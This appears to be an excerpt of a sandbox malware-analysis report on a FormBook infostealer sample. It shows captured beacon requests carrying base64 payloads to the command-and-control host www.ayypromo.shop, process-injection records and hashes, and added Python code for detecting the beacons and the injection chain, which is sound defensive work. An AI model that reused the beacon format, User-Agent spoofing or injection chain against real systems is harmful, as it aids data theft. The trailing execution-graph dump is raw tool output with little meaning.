                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49770 | 176.57.64.102 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:29:42.069953918 CEST | 483 | OUT | GET /rgqx/?3L9l=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.ayypromo.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Aug 26, 2024 18:29:42.704710960 CEST | 727 | IN | HTTP/1.1 404 Not Found
                                      Server: ddos-guard
                                      Connection: close
                                      Set-Cookie: __ddg1_=4zeL29F342mINNAYsAPa; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:42 GMT
                                      Date: Mon, 26 Aug 2024 16:29:42 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 340
                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                      ETag: "154-56d5bbe607fc0"
                                      X-Frame-Options: SAMEORIGIN
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
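The sessions above are the beacon pattern this report attributes to FormBook: every request goes to the same short path on www.ayypromo.shop, carries one or two short randomly named parameters whose value is base64 dropped into the form body or query string without percent-encoding, sets Origin and Referer to the C2 host itself, never sends back the __ddg1_ cookie the server keeps setting, and claims an Android tablet browser while the sending process is a 32-bit Windows executable. The following Python is an added example, not part of the Joe Sandbox report, that parses those captured requests and scores them against these traits. The request texts are reconstructed from the listing above (the 10 KB third POST is left out because the report truncates it); the heuristic names, the flag threshold of three and the 0.7 printable-byte cut-off are assumptions for illustration, not FormBook constants. Note the parser splits the body by hand: `urllib.parse.parse_qs()` would turn the `+` characters in the base64 into spaces and break decoding.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Copied from the session listing: sending process and User-Agent.
PROCESS = r"C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe"
UA = ("Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) "
      "AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36")


def _post(body: str) -> str:
    """Rebuild one of the captured POSTs with the headers listed in the report."""
    return ("POST /rgqx/ HTTP/1.1\r\n"
            "Host: www.ayypromo.shop\r\n"
            "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
            "Accept-Language: en-US,en;q=0.5\r\n"
            "Accept-Encoding: gzip, deflate\r\n"
            "Origin: http://www.ayypromo.shop\r\n"
            "Referer: http://www.ayypromo.shop/rgqx/\r\n"
            "Cache-Control: max-age=0\r\n"
            "Connection: close\r\n"
            f"Content-Length: {len(body)}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"User-Agent: {UA}\r\n\r\n{body}")


# Constructed sample input: payloads copied from the first two POSTs and the GET above.
B64_POST1 = ("p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8V"
             "otgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9"
             "bQpNTnXoBqkfi63wfLQA3XR8elI0Io5XkO9Bi6QT2PlEWdMY36vJ6w==")
B64_POST2 = ("p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8U"
             "Utg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9"
             "bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPB3LaFs65SAh6zd1D9N2/sNGTFhHiitKfU=")
B64_GET = ("k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/w"
           "kzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=")
CAPTURED = [
    _post("3L9l=" + B64_POST1),
    _post("3L9l=" + B64_POST2),
    ("GET /rgqx/?3L9l=" + B64_GET + "&kZr0=ht-lElyh HTTP/1.1\r\n"
     "Host: www.ayypromo.shop\r\n"
     "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
     "Accept-Language: en-US,en;q=0.5\r\n"
     "Connection: close\r\n"
     f"User-Agent: {UA}\r\n\r\n"),
]


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]
    params: List[Tuple[str, str]]  # raw name/value pairs, deliberately not plus-decoded


def parse_request(raw: str) -> Request:
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # The payload is raw base64, so "+" and "/" are payload characters; splitting
    # by hand keeps them intact where parse_qs() would map "+" to a space.
    raw_params = query if method == "GET" else body
    params = [tuple(p.split("=", 1)) for p in raw_params.split("&") if "=" in p]
    return Request(method, path, headers, params)


B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_payload(value: str) -> Optional[bytes]:
    """Decode a well-formed base64 value; None if it is not base64 at all."""
    if len(value) % 4 or not B64_RE.match(value):
        return None
    return base64.b64decode(value, validate=True)


def printable_ratio(data: bytes) -> float:
    return sum(32 <= b < 127 for b in data) / max(len(data), 1)


def triage(req: Request, process_path: str) -> List[str]:
    """Return the beacon traits the request shows (heuristic names are assumed)."""
    h = req.headers
    host = h.get("host", "")
    names = [n for n, _ in req.params]
    reasons: List[str] = []
    if 1 <= len(names) <= 2 and all(len(n) <= 4 and n.isalnum() for n in names):
        reasons.append("short_random_params")
    payload = decode_payload(req.params[0][1]) if req.params else None
    if payload and len(payload) >= 32 and printable_ratio(payload) < 0.7:
        reasons.append("opaque_b64_payload")       # decodes to a binary blob, not text
    if h.get("origin") == f"http://{host}" and h.get("referer", "").startswith(f"http://{host}{req.path}"):
        reasons.append("self_referential_origin")  # claims to come from the C2 page itself
    if "android" in h.get("user-agent", "").lower() and process_path.lower().endswith(".exe"):
        reasons.append("ua_os_mismatch")           # Android browser UA sent by a Windows PE
    if h.get("connection", "").lower() == "close" and "cookie" not in h:
        reasons.append("close_no_cookie")          # one-shot request, server cookie never echoed
    return reasons


def is_formbook_like(req: Request, process_path: str, threshold: int = 3) -> bool:
    return len(triage(req, process_path)) >= threshold


if __name__ == "__main__":
    for raw in CAPTURED:
        req = parse_request(raw)
        print(req.method, req.path, is_formbook_like(req, PROCESS), triage(req, PROCESS))
```

The response side carries little signal on its own: a 404 from a parked Tilda page behind ddos-guard looks like any dead link, which is why the scoring rests on the request shape and on the process that sent it rather than on the status code.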



                                      Target ID:0
                                      Start time:12:26:35
                                      Start date:26/08/2024
                                      Path:C:\Users\user\Desktop\031215-Revised-01.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\031215-Revised-01.exe"
                                      Imagebase:0x70000
                                      File size:1'276'416 bytes
                                      MD5 hash:1BF161B2BC2C8EFDDF6FBC402DFB9508
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:12:26:43
                                      Start date:26/08/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\031215-Revised-01.exe"
                                      Imagebase:0x1e0000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:12:27:11
                                      Start date:26/08/2024
                                      Path:C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe"
                                      Imagebase:0xe60000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Target ID:6
                                      Start time:12:27:13
                                      Start date:26/08/2024
                                      Path:C:\Windows\SysWOW64\rasdial.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                      Imagebase:0x3f0000
                                      File size:19'456 bytes
                                      MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:false

                                      Target ID:8
                                      Start time:12:27:26
                                      Start date:26/08/2024
                                      Path:C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe"
                                      Imagebase:0xe60000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Target ID:9
                                      Start time:12:27:38
                                      Start date:26/08/2024
                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                      Imagebase:0x7ff6bf500000
                                      File size:676'768 bytes
                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
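The Target entries above describe the chain this report attributes to the sample: svchost.exe running with the original sample's path as its command line (what a hollowed or injected-into process looks like in a listing), the dropped copy in a long randomly named directory under Program Files (x86), and rasdial.exe, a Microsoft binary, with FormBook Yara matches in its memory. The following Python is an added example, not part of the Joe Sandbox report, that turns those three observations into checks over the process records. The records are copied from the entries above (the Yara count is the number of rule matches listed per process); the heuristic names, the 20-character/4.0-bit entropy cut-off and the comparison details are assumptions for illustration. One detail worth keeping: the firefox.exe entry differs from its own command line only in case, so paths must be normalised before comparing or a legitimate process is flagged.

```python
import math
import ntpath
from collections import Counter
from typing import Dict, List

# Constructed sample input: the six Target entries from the report.
DROPPED = r"C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe"
RECORDS = [
    {"target": 0, "image": r"C:\Users\user\Desktop\031215-Revised-01.exe",
     "cmdline": r'"C:\Users\user\Desktop\031215-Revised-01.exe"', "yara_hits": 0},
    {"target": 1, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\031215-Revised-01.exe"', "yara_hits": 6},
    {"target": 5, "image": DROPPED, "cmdline": f'"{DROPPED}"', "yara_hits": 2},
    {"target": 6, "image": r"C:\Windows\SysWOW64\rasdial.exe",
     "cmdline": r'"C:\Windows\SysWOW64\rasdial.exe"', "yara_hits": 6},
    {"target": 8, "image": DROPPED, "cmdline": f'"{DROPPED}"', "yara_hits": 2},
    {"target": 9, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "yara_hits": 0},
]


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line, quoted or bare executable path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def shannon_entropy(s: str) -> float:
    """Bits per character; long random names score well above English words."""
    n = len(s)
    if not n:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def assess(rec: Dict) -> List[str]:
    """Return the injection-chain indicators a process record shows (assumed names)."""
    reasons: List[str] = []
    # ntpath.normcase lower-cases and fixes slashes on any host OS, so
    # "firefox.exe" and "Firefox.exe" compare equal as they do on Windows.
    image = ntpath.normcase(rec["image"])
    if image != ntpath.normcase(cmdline_image(rec["cmdline"])):
        reasons.append("image_cmdline_mismatch")   # image and command line disagree
    if image.startswith("c:\\windows\\") and rec["yara_hits"]:
        reasons.append("system_binary_yara_hit")   # malware rules matched inside a Microsoft binary
    # Entropy is measured on the original-case name: lower-casing merges letters
    # and lowers the score of mixed-case random strings.
    for part in ntpath.dirname(rec["image"]).split("\\"):
        if len(part) >= 20 and part.isalnum() and shannon_entropy(part) >= 4.0:
            reasons.append("random_install_dir")   # long high-entropy directory name
            break
    return reasons


def assess_all() -> Dict[int, List[str]]:
    return {rec["target"]: assess(rec) for rec in RECORDS}


if __name__ == "__main__":
    for target, reasons in assess_all().items():
        print(target, reasons or "-")
```

With these records only the sample itself (Target 0) and firefox.exe (Target 9) come back clean; the three indicators line up with the three injection steps the report's signatures describe (thread injection into svchost.exe, the dropped copy, and rasdial.exe as the final host).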


                                        Execution Graph

                                        Execution Coverage:3.4%
                                        Dynamic/Decrypted Code Coverage:0.4%
                                        Signature Coverage:2.9%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:70
[Execution graph omitted: the report renders it as a node/edge diagram that does not survive as text. API calls named on the nodes visible here: GetStdHandle, OleInitialize, InitializeCriticalSectionAndSpinCount, InterlockedExchange, GetCurrentProcess, DuplicateHandle, CreateThread, CloseHandle, RegisterWindowMessageW, EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, RaiseException, RtlAllocateHeap, RtlFreeHeap, GetLastError, GetOpenFileNameW, GetFullPathNameW, GetLongPathNameW, CreateStreamOnHGlobal, LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary.]
95732->95733 95733->95710 95734->95713 95735->95712 95736->95726 95737->95724 95738->95732 95739->95718 95741 8fddb 22 API calls 95740->95741 95742 75734 95741->95742 95742->95651 95744 742bc FindResourceExW 95743->95744 95745 742d9 95743->95745 95744->95745 95746 b35ba LoadResource 95744->95746 95745->95663 95746->95745 95747 b35cf SizeofResource 95746->95747 95747->95745 95748 b35e3 LockResource 95747->95748 95748->95745 95750 7512e 95749->95750 95751 b3d90 95749->95751 95755 9ece3 95750->95755 95754->95656 95758 9eaaa 95755->95758 95757 7513c 95757->95663 95761 9eab6 ___DestructExceptionObject 95758->95761 95759 9eac2 95771 9f2d9 20 API calls __dosmaperr 95759->95771 95760 9eae8 95773 9918d EnterCriticalSection 95760->95773 95761->95759 95761->95760 95764 9eac7 95772 a27ec 26 API calls pre_c_initialization 95764->95772 95766 9eaf4 95774 9ec0a 62 API calls 2 library calls 95766->95774 95768 9eb08 95775 9eb27 LeaveCriticalSection __fread_nolock 95768->95775 95770 9ead2 __fread_nolock 95770->95757 95771->95764 95772->95770 95773->95766 95774->95768 95775->95770 95779 9e8e1 95776->95779 95778 75118 95778->95669 95780 9e8ed ___DestructExceptionObject 95779->95780 95781 9e92d 95780->95781 95782 9e900 ___scrt_fastfail 95780->95782 95783 9e925 __fread_nolock 95780->95783 95792 9918d EnterCriticalSection 95781->95792 95806 9f2d9 20 API calls __dosmaperr 95782->95806 95783->95778 95786 9e937 95793 9e6f8 95786->95793 95787 9e91a 95807 a27ec 26 API calls pre_c_initialization 95787->95807 95792->95786 95797 9e70a ___scrt_fastfail 95793->95797 95799 9e727 95793->95799 95794 9e717 95881 9f2d9 20 API calls __dosmaperr 95794->95881 95796 9e71c 95882 a27ec 26 API calls pre_c_initialization 95796->95882 95797->95794 95797->95799 95801 9e76a __fread_nolock 95797->95801 95808 9e96c LeaveCriticalSection __fread_nolock 95799->95808 95800 9e886 ___scrt_fastfail 95884 9f2d9 20 API calls __dosmaperr 95800->95884 95801->95799 95801->95800 95809 9d955 95801->95809 95816 a8d45 95801->95816 
95883 9cf78 26 API calls 4 library calls 95801->95883 95806->95787 95807->95783 95808->95783 95810 9d961 95809->95810 95811 9d976 95809->95811 95885 9f2d9 20 API calls __dosmaperr 95810->95885 95811->95801 95813 9d966 95886 a27ec 26 API calls pre_c_initialization 95813->95886 95815 9d971 95815->95801 95817 a8d6f 95816->95817 95818 a8d57 95816->95818 95820 a90d9 95817->95820 95825 a8db4 95817->95825 95896 9f2c6 20 API calls __dosmaperr 95818->95896 95912 9f2c6 20 API calls __dosmaperr 95820->95912 95821 a8d5c 95897 9f2d9 20 API calls __dosmaperr 95821->95897 95824 a90de 95913 9f2d9 20 API calls __dosmaperr 95824->95913 95826 a8d64 95825->95826 95828 a8dbf 95825->95828 95832 a8def 95825->95832 95826->95801 95898 9f2c6 20 API calls __dosmaperr 95828->95898 95829 a8dcc 95914 a27ec 26 API calls pre_c_initialization 95829->95914 95831 a8dc4 95899 9f2d9 20 API calls __dosmaperr 95831->95899 95835 a8e08 95832->95835 95836 a8e4a 95832->95836 95837 a8e2e 95832->95837 95835->95837 95871 a8e15 95835->95871 95903 a3820 21 API calls 2 library calls 95836->95903 95900 9f2c6 20 API calls __dosmaperr 95837->95900 95840 a8e33 95901 9f2d9 20 API calls __dosmaperr 95840->95901 95841 a8e61 95844 a29c8 _free 20 API calls 95841->95844 95847 a8e6a 95844->95847 95845 a8fb3 95848 a9029 95845->95848 95852 a8fcc GetConsoleMode 95845->95852 95846 a8e3a 95902 a27ec 26 API calls pre_c_initialization 95846->95902 95850 a29c8 _free 20 API calls 95847->95850 95851 a902d ReadFile 95848->95851 95853 a8e71 95850->95853 95854 a90a1 GetLastError 95851->95854 95855 a9047 95851->95855 95852->95848 95856 a8fdd 95852->95856 95857 a8e7b 95853->95857 95858 a8e96 95853->95858 95859 a90ae 95854->95859 95860 a9005 95854->95860 95855->95854 95861 a901e 95855->95861 95856->95851 95862 a8fe3 ReadConsoleW 95856->95862 95904 9f2d9 20 API calls __dosmaperr 95857->95904 95906 a9424 28 API calls __wsopen_s 95858->95906 95910 9f2d9 20 API calls __dosmaperr 95859->95910 95878 a8e45 __fread_nolock 95860->95878 95907 9f2a3 
20 API calls 2 library calls 95860->95907 95874 a906c 95861->95874 95875 a9083 95861->95875 95861->95878 95862->95861 95863 a8fff GetLastError 95862->95863 95863->95860 95864 a29c8 _free 20 API calls 95864->95826 95869 a8e80 95905 9f2c6 20 API calls __dosmaperr 95869->95905 95870 a90b3 95911 9f2c6 20 API calls __dosmaperr 95870->95911 95887 af89b 95871->95887 95908 a8a61 31 API calls 4 library calls 95874->95908 95877 a909a 95875->95877 95875->95878 95909 a88a1 29 API calls __wsopen_s 95877->95909 95878->95864 95880 a909f 95880->95878 95881->95796 95882->95799 95883->95801 95884->95796 95885->95813 95886->95815 95888 af8a8 95887->95888 95889 af8b5 95887->95889 95915 9f2d9 20 API calls __dosmaperr 95888->95915 95892 af8c1 95889->95892 95916 9f2d9 20 API calls __dosmaperr 95889->95916 95891 af8ad 95891->95845 95892->95845 95894 af8e2 95917 a27ec 26 API calls pre_c_initialization 95894->95917 95896->95821 95897->95826 95898->95831 95899->95829 95900->95840 95901->95846 95902->95878 95903->95841 95904->95869 95905->95878 95906->95871 95907->95878 95908->95878 95909->95880 95910->95870 95911->95878 95912->95824 95913->95829 95914->95826 95915->95891 95916->95894 95917->95891 95921 9e4e8 95918->95921 95920 e275d 95920->95671 95924 9e469 95921->95924 95923 9e505 95923->95920 95925 9e478 95924->95925 95926 9e48c 95924->95926 95932 9f2d9 20 API calls __dosmaperr 95925->95932 95930 9e488 __alldvrm 95926->95930 95934 a333f 11 API calls 2 library calls 95926->95934 95929 9e47d 95933 a27ec 26 API calls pre_c_initialization 95929->95933 95930->95923 95932->95929 95933->95930 95934->95930 95939 e2e7a 95935->95939 95936 e2d3b 95936->95588 95936->95589 95937 750f5 40 API calls 95937->95939 95938 e28fe 27 API calls 95938->95939 95939->95936 95939->95937 95939->95938 95940 7511f 64 API calls 95939->95940 95940->95939 95942 e22e7 95941->95942 95943 e22d9 95941->95943 95945 e232c 95942->95945 95946 9e5eb 29 API calls 95942->95946 95958 e22f0 95942->95958 95944 9e5eb 29 API calls 
95943->95944 95944->95942 95970 e2557 95945->95970 95948 e2311 95946->95948 95948->95945 95950 e231a 95948->95950 95949 e2370 95951 e2374 95949->95951 95952 e2395 95949->95952 95954 9e678 67 API calls 95950->95954 95950->95958 95953 e2381 95951->95953 95957 9e678 67 API calls 95951->95957 95974 e2171 95952->95974 95953->95958 95961 9e678 67 API calls 95953->95961 95954->95958 95956 e239d 95959 e23c3 95956->95959 95960 e23a3 95956->95960 95957->95953 95958->95588 95981 e23f3 95959->95981 95963 9e678 67 API calls 95960->95963 95964 e23b0 95960->95964 95961->95958 95963->95964 95964->95958 95965 9e678 67 API calls 95964->95965 95965->95958 95966 e23de 95966->95958 95969 9e678 67 API calls 95966->95969 95967 e23ca 95967->95966 95989 9e678 95967->95989 95969->95958 95971 e257c 95970->95971 95973 e2565 __fread_nolock 95970->95973 95972 9e8c4 __fread_nolock 40 API calls 95971->95972 95972->95973 95973->95949 95975 9ea0c ___std_exception_copy 21 API calls 95974->95975 95976 e217f 95975->95976 95977 9ea0c ___std_exception_copy 21 API calls 95976->95977 95978 e2190 95977->95978 95979 9ea0c ___std_exception_copy 21 API calls 95978->95979 95980 e219c 95979->95980 95980->95956 95985 e2408 95981->95985 95982 e24c0 96006 e2724 95982->96006 95984 e21cc 40 API calls 95984->95985 95985->95982 95985->95984 95988 e24c7 95985->95988 96002 e2606 95985->96002 96010 e2269 40 API calls 95985->96010 95988->95967 95990 9e684 ___DestructExceptionObject 95989->95990 95991 9e6aa 95990->95991 95992 9e695 95990->95992 96001 9e6a5 __fread_nolock 95991->96001 96046 9918d EnterCriticalSection 95991->96046 96063 9f2d9 20 API calls __dosmaperr 95992->96063 95994 9e69a 96064 a27ec 26 API calls pre_c_initialization 95994->96064 95997 9e6c6 96047 9e602 95997->96047 95999 9e6d1 96065 9e6ee LeaveCriticalSection __fread_nolock 95999->96065 96001->95966 96003 e2617 96002->96003 96004 e261d 96002->96004 